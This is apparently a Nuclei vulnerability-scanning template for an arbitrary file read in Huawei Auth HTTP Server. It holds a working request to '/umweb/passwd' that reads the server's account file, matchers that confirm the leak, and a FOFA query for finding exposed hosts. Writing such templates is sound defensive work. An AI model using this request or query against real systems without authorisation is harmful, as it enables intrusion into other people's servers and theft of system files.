id: huawei-authhttp-lfi

info:
  name: Huawei Auth Http Server - Arbitrary File Read
  author: DhiyaneshDk
  severity: high
  description: Huawei Auth HTTP Server is vulnerable to Arbitrary File Read.
  reference:
    - https://mp.weixin.qq.com/s?__biz=MzIxMTg1ODAwNw==&mid=2247498499&idx=1&sn=6850c3e9a3df795e48ba9a10c9772ddd
    - https://github.com/Vme18000yuan/FreePOC/blob/master/poc/pocsuite/huawei-auth-http-readfile.py
  metadata:
    verified: true
    max-request: 1
    fofa-query: server="Huawei Auth-Http Server 1.0"
  tags: lfi,huawei,authhttp

http:
  - method: GET
    path:
      - "{{BaseURL}}/umweb/passwd"

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "Huawei Auth-Http Server"

      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022043109a02d7568d0141afab8803c9245d89af4ce6961eb74bd32c108db2b9e25c022100ad7848d589222f5fd3ed055fd61b2d646877624d2ae0f6afaa11904a8f9be91a:922c64590222798bb761d5b6d8e72950